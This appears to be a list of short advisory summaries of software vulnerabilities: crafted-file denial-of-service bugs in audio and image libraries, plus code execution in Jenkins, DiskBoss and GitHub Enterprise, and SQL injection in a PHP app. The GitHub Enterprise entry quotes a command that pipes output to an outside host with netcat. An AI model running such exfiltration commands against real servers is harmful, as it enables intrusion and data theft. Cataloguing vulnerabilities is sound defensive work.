The _tokenize_matrix function in audio_out.c in Xiph.Org libao 1.2.0 can cause a denial of service(memory corruption) via a crafted mp3 file. I found this bug when I test mpg321 0.3.2 which used the libao library.
The vorbis_analysis_wrote function in lib/block.c in Xiph.Org libvorbis 1.3.5 can cause a denial of service(OOM) via a crafted wav file. The vorbis_block_clear function in lib/block.c in Xiph.Org libvorbis 1.3.5 can cause a denial of service(NULL pointer dereference and application crash) via a crafted ogg file.
The startread and startwrite functions in wav.c in Sound eXchange(SoX) 14.4.2 can cause a denial of service(divide-by-zero error and application crash) via a crafted wav file.
The wav_open function in oggenc/audio.c in vorbis-tools 1.4.0 can cause a denial of service(memory allocation error) via a crafted wav file.
DiskBoss Enterprise with management web-console enabled can lead to full system takeover.
This exploit allows an attacker to execute arbitrary code on a vulnerable Jenkins server. It is based on the CVE-2016-0792 vulnerability, which is a deserialization vulnerability in Jenkins. The exploit works by sending a specially crafted payload to the Jenkins server, which is then deserialized and executed. The payload contains a command that is executed on the server, allowing the attacker to gain access to the server.
The VehicleWorkshop application is vulnerable to SQL injection. The application is vulnerable to a SQL injection attack due to the lack of input validation on the 'vahicleid' parameter in the 'viewvehiclestoremore.php' page. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable page, which can be used to extract sensitive information from the database.
This exploit allows an attacker to execute arbitrary code on a vulnerable GitHub Enterprise server. The exploit works by sending a specially crafted payload to the server via a POST request. The payload contains a malicious marshal code which is then executed by the server. The code is then used to execute a command on the server, such as 'id | nc orange.tw 12345'. The exploit can be triggered by inserting a webhook from the settings page of a repository and then triggering the RCE from the search page.
The fill_input_buffer function in jdatasrc.c in libjpeg-turbo 1.5.1 can cause a denial of service(invalid address and application crash) via a crafted jpg file.
The fill_buffer_resample function in libmp3lame/util.c in LAME 3.99.5 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted wav file. The lame_encode_buffer_sample_t function in libmp3lame/lame.c in LAME 3.99.5 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted wav file.
Services By CQR